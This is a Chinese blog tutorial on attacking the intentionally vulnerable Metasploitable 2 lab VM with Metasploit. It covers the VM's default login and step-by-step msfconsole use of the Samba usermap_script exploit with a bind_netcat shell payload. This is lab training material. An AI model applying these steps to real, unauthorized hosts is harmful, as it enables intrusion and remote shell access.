通过metasploit工具渗透Metasploitable 2靶机

    首先,是Metasploitable 2的在本地的安装,

    下载地址:https://sourceforge.net/projects/metasploitable/?source=typ_redirect。下载过后解压。会有四个文件。

    

        用VM打开.vmsd文件。如果遇见需要配置文件什么的,就用VM打开vmx文件。

        就会显示下面:



打开虚拟机账号密码都是:msfadmin




这时候用正主metasploit来渗透啦:我的是在Windows上的

它一共提供了三种使用接口,一个是msfgui图形化界面,还有就是msfconsole控制台终端,最后一个就是msfcli命令行程序

我是用msfconcole控制台终端;

打开windows命令行提示符输入   msfconsole




输入   help  出现各种命令  https://www.cnblogs.com/lsgxeva/p/8450277.html  这个网址提供了各种命令行的解释。我在这里不提供解释。



输入  search Samba  我们是通过靶机中的Samba服务漏洞就行渗透攻击。使用这个命令来查找metasploit中的渗透代码库中攻击Samba服务的模块。如下图显示,会出现一些列的模块,我们找到usermap_script安全漏洞的攻击模块。可以发现名称为:multi/samba/usermap_script.



运行:use multi/samba/usermap_script  命令选择这个渗透攻击。

使用   show  payloads  查看渗透攻击模块相兼容模块的攻击载荷。

使用“set payload cmd/unix/bind_netcat”选择bind_netcat  执行shell

"show option"查看配置参数结果显示我们只需要配置,rhost为攻击目标的ip,rport目标端口,lport攻击载荷监听端口,以及target目标这个默认就行




设置好后,输入,exploit就可以了,此时你已经拿到了,这台靶机的使用权限。可以通过shell命令来查看自己一些你想要的东西。




如果出现下面的情况,可能是你的端口号没搞对







  • 5
    点赞
  • 42
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值